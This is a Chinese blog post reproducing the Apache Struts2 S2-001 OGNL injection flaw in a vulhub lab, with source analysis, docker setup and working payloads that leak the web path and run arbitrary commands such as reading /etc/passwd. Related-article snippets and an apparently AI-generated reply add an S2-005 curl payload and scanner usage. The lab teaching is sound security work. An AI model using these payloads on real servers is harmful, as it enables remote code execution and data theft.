S2-001漏洞靶场复现

最新推荐文章于 2024-09-21 16:31:24 发布
最新推荐文章于 2024-09-21 16:31:24 发布
阅读量527 收藏
点赞数
分类专栏: 网络安全 文章标签: 渗透测试 靶机 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42947816/article/details/122795903
版权

1、漏洞描述

Struts2是一个基于MVC设计模式Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。

WebWork 2.1+ 和 Struts 2 的 'altSyntax' 特性允许将 OGNL 表达式插入文本字符串并进行递归处理,这允许恶意用户提交一个字符串。如果用户提交表单验证失败,且提交的参数中包含一个 OGNL 表达式,服务器将执行该表达式。

2、影响版本

WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, Struts 2.0.0 - Struts 2.0.8

3、漏洞简单分析

  • 问题主要是出在translateVariables函数中,源码如下:

public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) {
        // deal with the "pure" expressions first!
        //expression = expression.trim();
        Object result = expression;

        while (true) {
            int start = expression.indexOf(open + "{");
            int length = expression.length();
            int x = start + 2;
            int end;
            char c;
            int count = 1;
            while (start != -1 && x < length && count != 0) {
                c = expression.charAt(x++);
                if (c == '{') {
                    count++;
                } else if (c == '}') {
                    count--;
                }
            }
            end = x - 1;

            if ((start != -1) && (end != -1) && (count == 0)) {
                String var = expression.substring(start + 2, end);

                Object o = stack.findValue(var, asType);
                if (evaluator != null) {
                    o = evaluator.evaluate(o);
                }


                String left = expression.substring(0, start);
                String right = expression.substring(end + 1);
                if (o != null) {
                    if (TextUtils.stringSet(left)) {
                        result = left + o;
                    } else {
                        result = o;
                    }

                    if (TextUtils.stringSet(right)) {
                        result = result + right;
                    }

                    expression = left + o + right;
                } else {
                    // the variable doesn't exist, so don't display anything
                    result = left + right;
                    expression = left + right;
                }
            } else {
                break;
            }
        }

        return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
    }

  • 此时expression%{password}

  • 经过while循环,此时varpassword

  • stack.findValue(var, asType);会返回password的值%{1+1},这个就是我们传入的payload:

  • 此后o%{1+1},再对o进行了一番处理后,payload经过result变量,最终成为expression的值:

  • 在完成后,进入下一个循环:

  • 并且在Object o = stack.findValue(var, asType);中完成了对payload的执行:

  • 总结:究其原因,在于在translateVariables函数中,递归解析了表达式,在处理完%{password}后将password的值直接取出并继续在while循环中解析,若用户输入的password是恶意的OGNL表达式,比如%{1+1},则得以解析执行。

4、漏洞复现

4.1 环境搭建

使用vulnhub进行搭建https://github.com/vulhub/vulhub

cd vulhub-master/struts2/s2-001

docker-compose build

docker-compose up -d

4.2 最简单POC语句尝试,输入%{1+1},语句成功执行

4.3 尝试获取Web路径

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

4.4 执行任意命令,只需修改命令加参数,例如new java.lang.String[]{"cat","/etc/passwd"}

%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }

参考链接:

https://xz.aliyun.com/t/2044

https://xz.aliyun.com/t/2672#toc-2

https://www.freebuf.com/articles/web/280245.html

https://cwiki.apache.org/confluence/display/WW/S2-001

命令执行漏洞—简单利用1(墨者靶场
weixin_44431280的博客
03-03 1897
命令执行漏洞—简单利用1(墨者靶场) 命令执行漏洞原理和简介可参考文章:Web安全—远程命令/代码执行(RCE) 命令执行漏洞靶场通关: 步骤一:靶场登陆,输入IP地址查看回显。查看Web界面存在输入IP地址的地方,尝试输入环回地址127.0.0.1查看回显 输入IP地址127.0.0.1查看回显: 步骤二:信息收集判断操作系统,尝试使用系统连接符执行连带命令,例如127.0.0.1;ls。 1,使用Google插件Waapalyzer判断操作系统为Ubuntu(linux),可以使用连接符";"和“管
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1803
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
S2-001漏洞分析
灰蜗牛
02-23 1511
Struts2是流行和成熟的基于MVC设计模式的Web应用程序框架。S2-001漏洞是由于 Struts 2 框架处理 HTTP 请求中某些参数的方式存在缺陷。具体来说,该框架无法正确验证这些参数中的用户输入,从而允许攻击者将恶意负载注入应用程序。有效负载可以包含应用程序处理请求时在服务器上执行的任意代码。
Struts2 远程代码执行漏洞S2-001分析
st3pby的博客
01-05 1204
首先来了解 OGNL 表达式,OGNL(Object Graphic Navigatino Language)的中文全称为“对象图导航语言”,是应用于Java中的一个开源的功能强大的表达式语言(Expression Language),它被集成在Struts2等框架中,通过简单一致的表达式语法,可以存取对象的任何属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。OGNL进行对象存取操作的API在Ognl.java文件中,分别是getValue、setValue两个方法。
Vulfocus靶场漏洞复现系列—1
tlovejr的博客
03-02 6377
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的复现漏洞过程,我所用的是Vulfocus靶场靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
vulhub靶场框架漏洞复现手册(strusts2\shiro\weblogic)附工具链接
zwy15288408160的博客
12-15 2288
工具+手工复现vulhub靶场下的框架漏洞,包括struts2远程代码执行(2-029,s2-061,s2-001),shiro反序列化漏洞(CVE-2016-4437),weblogic反序列化漏洞(CVE-2017-10271,CVE-2018-2628,CVE-2018-2894,CVE-2020-14882,ssrf,weak-password)。持续更新中...持续更新中...
Apache Struts2远程代码执行漏洞(S2-001)复现
2401_87298694的博客
09-21 862
​ OGNL还支持处理集合即Map,List和Set。​ 除了#,% 在 OGNL 表达式中也经常出现,它提供一个OGNL表达式运行环境。
Struts2 S2-046漏洞复现 (CVE-2017-5638)
1
05-27 4304
一:漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-013(CVE-2013-1966)
qq_51577576的博客
11-24 753
在Struts2标签中和都包含一个includeParams属性,其值可设置为none、get 或 all,其对应意义分别为,none:链接不包含请求的任意参数值(默认),get:链接只包含GET请求中的参数和其值,all:链接包含GET和POST所有参数和其值.用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上.这个参数会进行OGNL表达式解析,从而可以插入任意OGNL表达式导致任意代码执行
Apache struts2 namespace远程命令执行—CVE-2018-11776(S2-057)漏洞复现
浅浅的博客
07-28 3242
Apache struts2 namespace远程命令执行—CVE-2018-11776(S2-057)漏洞复现 一、漏洞描述 S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码以及系统命令到服务器系统中去。 二、漏洞影响版本 Apache Strut...
24个常见渗透测试漏洞靶场列表
一只臭皮匠的博客
09-09 7389
0x01 在线靶场 BUUCTF在线评测:https://buuoj.cn Vulhub漏洞环境集合:https://vulhub.org 韩国Webhacking:https://webhacking.kr 重生信息安全在线靶场:https://bc.csxa.cn 网络信息安全攻防学习平台:http://hackinglab.cn 墨者学院在线靶场:https://www.mozhe.cn/bug 封神台在线演练靶场:https://hack.zkaq.cn/battle 安鸾渗透实战平台:http:
S2-001 漏洞复现
qq_36594628的博客
07-23 508
S2-001 一、漏洞原理 ​ 因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。 二、影响版本 ​ Struts 2.0.0 - 2.0.8 三、复现步骤 1、docker开启服务 2、访问<虚拟机IP>:8080 注:我的虚拟
vulhub靶场搭建以及对于struts2漏洞s2-001的idea环境调试搭建,ctf.show的java(web279-web280)
wanan的博客
09-03 2265
vulhub靶场搭建以及对于struts2漏洞s2-001的idea环境调试搭建,ctf.show的java(web279-web280)
墨者靶场 初级:Struts2远程代码执行漏洞(S2-001
qq_43233085的博客
01-14 523
墨者靶场 初级:Struts2远程代码执行漏洞(S2-001)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某日,安全工程师"墨者"对一单位业务系统进行授权扫描,在扫描过程中,发现了某个业务系统使用Apache Struts2框架。不知道运维人员是否修补了漏洞。 实训目标 1、了解Apache Struts2框架; 2、了解Apache Struts2目录遍历漏洞(S2-004); 3、...
web应用常见漏洞
qq_43590351的博客
09-11 845
web应用常见漏洞 <span style="color:red;">红色</span> 学习目标 章节 学习目标 ThinkPHP 远程代码执行 掌握 Think php框架 V2.x (和V5.0.20) 远程代码执行漏洞利用方式 Stuts2 代码执行漏洞 掌握 Stuts2 (CVE-2019-0230) 远程代码执行漏洞的利用方式 Shiro
Weblogic RCE + confluence RCE + cacti RCE正反向代理靶场
Love&Share
04-07 2464
与实际区别。
S2-001 远程代码执行 漏洞复现
Senimo
07-27 3264
S2-001 远程代码执行 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。 二、漏洞影响 三、漏洞复现 1
java struts2 漏洞复现合集
whatday的专栏
08-31 7709
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
s2系列————s2-001叙利亚版本一键化操作
qq_54030686的博客
02-28 463
s2-001叙利亚版本一键化操作 s2-001漏洞 不过多介绍,使用vulhub搭建相应靶场即可,在linux下正常运行,在windows下有可能出现状态码为500的可能,在请求头中增加Content-Type:application/x-www-form-urlencoded属性值即可正常返回,本脚本使用python编写,回显过程中,会出现些问题,包括,jssionid未过滤,命令回显字母缺失等问题,故称:叙利亚版本 右边为实际值,左边为脚本输出值,看的 这个还是有蛮大区别的,但是命令回显肯定正常执行,用
struts2框架漏洞扫描靶场
最新发布
04-03
<think>好的,我需要帮助用户找到关于Struts2框架漏洞扫描的靶场或练习环境。首先,我应该回顾用户提供的引用内容,看看有哪些相关的信息可以利用。 根据引用[2],vulhub靶场提供了多个Struts2漏洞环境,比如s2-001。用户提到这个靶场链接,可能需要指导如何搭建环境。引用[4]详细说明了如何启动docker环境并找到对应的目录,比如进入s2-061目录后用docker-compose启动。这部分信息应该整理出来,告诉用户具体的步骤。 然后,引用[1]提到了Struts2-Scan工具,这是一个全漏洞扫描利用工具,项目地址在gitcode上。用户可能需要结合这个工具来扫描和利用靶场中的漏洞,所以需要将工具的使用和靶场环境结合起来说明。 另外,引用[3]和[5]提到了具体的漏洞原理和影响版本,虽然用户主要问的是靶场环境,但可能也需要简要说明漏洞的背景,帮助用户理解练习的目的。比如在s2-005漏洞环境中,用户可以练习如何绕过安全限制执行OGNL表达式。 接下来,用户的需求是寻找练习环境,所以需要分步骤说明如何搭建vulhub的环境,启动具体的Struts2漏洞实例,并推荐使用Struts2-Scan工具进行扫描和测试。同时,可能需要提醒用户注意安全,确保在本地或授权环境中进行测试,避免未经授权的扫描。 最后,用户可能需要更多资源,比如官方文档或社区支持,引用中虽然没有直接提到,但可以建议参考vulhub的官方文档和Struts2-Scan的GitHub页面获取最新信息。同时,生成相关问题,帮助用户进一步深入学习,比如如何分析漏洞原理或优化扫描工具的使用。</think>### 分步说明:搭建Struts2漏洞扫描靶场环境 #### 1. Vulhub靶场环境搭建(推荐) Vulhub提供完整的Struts2漏洞复现环境,支持多个经典漏洞版本: - 启动Docker服务 ```bash service docker start ``` - 下载并部署特定漏洞环境(以S2-001为例) ```bash cd ./vulhub-master/struts2/s2-001 docker-compose up -d # 启动容器[^2][^4] ``` - 访问漏洞页面:浏览器输入`http://localhost:8080`,页面后缀为`.action`或`.do`即表明Struts2框架运行成功 #### 2. 漏洞扫描工具使用 推荐使用`Struts2-Scan`工具进行自动化检测: ```bash git clone https://gitcode.com/gh_mirrors/st/Struts2-Scan cd Struts2-Scan python3 struts2_scan.py -u http://target_url # 指定目标地址扫描[^1] ``` 该工具支持检测包括S2-005、S2-061在内的20+漏洞[^3][^5] #### 3. 典型漏洞实验示例(S2-005) - 漏洞原理:通过OGNL表达式绕过安全限制执行系统命令 - 复现步骤: ```bash curl -X POST "http://localhost:8080/login.action" \ --data "('\u0023_memberAccess.allowStaticMethodAccess\u003dtrue')(bla)(bla)&('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)" ``` 该请求将触发OGNL表达式执行[^3] #### 4. 安全注意事项 - 仅在本地环境或授权靶场进行测试 - 测试后及时关闭容器 ```bash docker-compose down # 在漏洞目录执行 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值